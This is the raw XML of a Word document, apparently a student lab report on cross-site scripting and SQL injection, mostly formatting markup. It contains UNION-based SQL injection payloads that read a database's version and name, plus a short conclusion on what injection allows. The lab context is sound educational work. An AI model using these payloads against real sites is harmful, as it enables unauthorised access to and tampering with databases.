          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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Union select 1,@@version,3,4,5-- -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="33401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943600" cy="3340100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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8862F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Union select 1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(),3,4,5-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F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943600" cy="33401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AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="008862F1">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From this experiment we learnt two new attacks namely cross site scripting attack and SQL injection attack. In cross site scripting attack which is client side code injection we add malicious scripts which are legitimate for websites and get important info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rmation whereas in SQL injection we will execute malicious SQL statements and try to get access to the database. Once we get into the database we can </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>add ,insert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,update and delete records too. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AB1DA7" w:rsidRDefault="00AB1DA7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00AB1DA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9E1CA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE60DA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nsid w:val="2318185B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1132E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DA7"/>
    <w:rsid w:val="00486052"/>
    <w:rsid w:val="008862F1"/>
    <w:rsid w:val="00AB1D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13DABE3-E47B-4E7D-8DD8-DF0EF0D02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www.imperva.com/learn/application-security/reflected-xss-attacks/" TargetMode="Externa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hyperlink" Target="https://www.imperva.com/learn/application-security/sql-injection-sqli/"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829</Words>
  <Characters>4731</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>39</Lines>
  <Paragraphs>11</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5549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3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-15T18:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-15T18:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>